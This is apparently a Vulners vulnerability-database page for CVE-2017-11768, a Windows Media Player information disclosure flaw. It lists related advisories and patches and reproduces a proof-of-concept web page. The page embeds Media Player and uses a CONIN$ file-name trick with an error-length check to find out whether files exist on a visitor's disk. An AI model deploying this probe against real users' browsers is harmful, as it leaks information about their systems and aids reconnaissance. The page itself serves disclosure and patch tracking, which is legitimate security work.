Windows Media Player Information Disclosure
| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
| Microsoft Windows Media Player Local Information Disclosure Vulnerability | 16 Nov 201700:00 | – | cnvd | |
| CVE-2017-11768 | 15 Nov 201703:00 | – | cve | |
| CVE-2017-11768 | 15 Nov 201703:00 | – | cvelist | |
| EUVD-2017-3377 | 7 Oct 202500:30 | – | euvd | |
| Description of the security update for the Windows Media Player Information Disclosure Vulnerability in Windows Server 2008: December 12, 2017 | 14 Nov 201708:00 | – | mskb | |
| November 14, 2017—KB4048952 (OS Build 10586.1232) | 14 Nov 201708:00 | – | mskb | |
| November 14, 2017—KB4048953 (OS Build 14393.1884) | 14 Nov 201708:00 | – | mskb | |
| November 14, 2017—KB4048954 (OS Build 15063.726 and 15063.728) | 14 Nov 201708:00 | – | mskb | |
| November 14, 2017—KB4048955 (OS Build 16299.64) | 14 Nov 201708:00 | – | mskb | |
| November 14, 2017—KB4048956 (OS Build 10240.17673) | 14 Nov 201708:00 | – | mskb |
10
`https://www.facebook.com/ExploitWareLabs/posts/1647568611973673
CVE-2017-11768 PoC code:
<b>existing file:</b>
<!-- "existing file:" with a bold tag to present a Windows Media Player mp3
file is going to test for the presence of files on disk, in our case we are
detecting cmd.exe binary in system32 folder. -->
<br>
<br>
<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">
<!-- Instantiating Specific class id - Windows Media Player HTMLView CLSID
"6BF52A52-394A-11d3-B153-00C04F79FAA6" to embed Windows Media Player. -->
<PARAM NAME="URL" VALUE="file://C://Windows//system32//cmd.exe//CONIN$.mp3">
<!-- Testing for the presence of files on disk via param.url. I added
"CONIN$.mp3" at the end of VALUE for valid detection, otherwise you'll get
prompt that says "doesn't match the file format". CONIN$ is a console input
device, the parameter of well known Windows function CreateFile. CONIN$ is
reserved name on Windows which mean it's invalid mp3 file name thus
bypasses prompt that checks extension. You can change param.url to your
desired file/folder to detect. -->
<param name="captioningID" value="displaylyric" />
<PARAM NAME="autoStart" VALUE="-1">
</OBJECT>
<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>
if(Player.error.item(0).errorDescription.length==189){
alert('File not detected.');
}
else{
alert('File detected!');
}
</SCRIPT>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2017 00:00Current
5.6Medium risk
Vulners AI Score5.6
EPSS0.06401